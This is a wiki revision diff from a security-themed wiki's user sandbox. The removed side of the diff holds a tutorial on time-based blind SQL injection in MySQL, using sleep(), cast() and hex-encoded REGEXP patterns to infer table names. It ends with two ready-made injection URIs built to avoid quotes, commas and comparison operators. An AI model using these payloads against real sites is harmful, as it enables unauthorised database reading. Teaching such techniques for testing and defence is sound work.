
Difference between revisions of "User:Mike/Sandbox"

From NetSec
(Replaced content with "<nowiki>~~~</nowiki> = default sig (change it in prefs) ~~~ <nowiki>~~~~</nowiki> = sig then time ~~~~ <nowiki>~~~~~</nowiki> = time ~~~~~")
Line 1: Line 1:
===='''Using sleep() to map a table name with regular expressions'''====
+
<nowiki>~~~</nowiki> = default sig (change it in prefs) [[User:Mike|Mike]]
{{protip|<i>'''[[#Advanced:_Using_Regex|Regular expressions]] in mysql don't need quotes, it is interchangeable with [[#Quotes|0x'''hex''']]!'''</i>}}
+
{| class="wikitable" width="90%"
+
|
+
<source lang="sql">  mysql> select table_name from information_schema.tables where table_schema=database() limit 1 offset 0;
+
  +------------+
+
  | table_name |
+
  +------------+
+
  | sample    |
+
  +------------+
+
  1 row in set (0.00 sec)</source>
+
* The first letter of "sample" is '''s''', it isn't between '''a''' and '''m''', therefore it won't sleep at all when we test to see if it is:
+
<source lang="sql">  mysql> select * from sample where id=1 and sleep((select cast(
+
          (select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp '^[a-m]')
+
        as signed) * 15));</source>
+
  Empty set ('''0.00 sec''')
+
  
* However, when we test to see if it's between n-z, because '''s''' is between '''n''' and '''z''' the return output from '''REGEXP''' is multiplied and becomes '''15''', which is passed to the '''sleep()''' function:
+
<nowiki>~~~~</nowiki> = sig then time [[User:Mike|Mike]] 13:01, 2 May 2012 (MSK)
<source lang="sql"> mysql> select * from sample where id=1 and sleep((select cast(
+
          (select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp '^[n-z]')
+
        as signed) * 15));</source>
+
  Empty set ('''15.00 sec''')
+
  
* So, an injection URI that utilizes sleep(), cast(), and '''multiplication''' can be used remotely in cases of unpredictable output and without the need for quotes, commas, comment notation, or standard comparison operators ('''&lt;, &#x3d;, &gt;''') to test if the first character of the first table in the database is between '''a''' and '''m''' would look like:
+
<nowiki>~~~~~</nowiki> = time 13:01, 2 May 2012 (MSK)
/vulnerable.ext?id=1 and sleep((select cast((select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp 0x5e612d6d) as signed) * 15));
+
 
+
* However the n-z would look like:
+
/vulnerable.ext?id=1 and sleep((select cast((select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp 0x5e6e2d7a) as signed) * 15));
+
|}
+
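Review bot: the entire "Using sleep() to map a table name with regular expressions" section (heading through the closing `|}`) is removed, and the edit summary ("Replaced content with ...") does not say whether that write-up was promoted to an article page or simply discarded; if it moved, state the destination in the summary so the removal stays traceable from this diff. The right-hand side keeps only the three signature-syntax notes (`~~~`, `~~~~`, `~~~~~`), so a reader landing on this revision for the sleep()/REGEXP technique has no pointer back to it.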

Revision as of 10:01, 2 May 2012

~~~ = default sig (change it in prefs) Mike

~~~~ = sig then time Mike 13:01, 2 May 2012 (MSK)

~~~~~ = time 13:01, 2 May 2012 (MSK)